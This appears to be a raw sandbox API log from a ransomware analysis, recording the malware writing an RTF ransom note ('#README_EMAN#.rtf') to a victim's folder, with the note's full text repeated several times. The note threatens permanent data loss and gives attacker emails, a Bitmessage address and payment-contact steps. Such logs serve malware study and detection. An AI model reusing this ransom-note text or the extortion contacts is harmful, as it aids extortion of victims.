HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nªV\x9a\x1d0Q²e\x02ï|O\x18·\x91\x0f\x92Î\x12µK\x16Õ3\x1e", lpUsedDefaultChar=0x0) returned 8717 [0269.787] WriteFile (in: hFile=0x284, lpBuffer=0x1ee8a78*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1ee8a78*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0269.788] CloseHandle (hObject=0x284) returned 1 [0269.788] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Color\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\adobe\\color\\#readme_eman#.rtf")) returned 0xffffffff [0269.788] GetLastError () returned 0x2 [0269.788] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Color\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\adobe\\color\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x284 [0269.789] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0269.789] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0269.789] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and 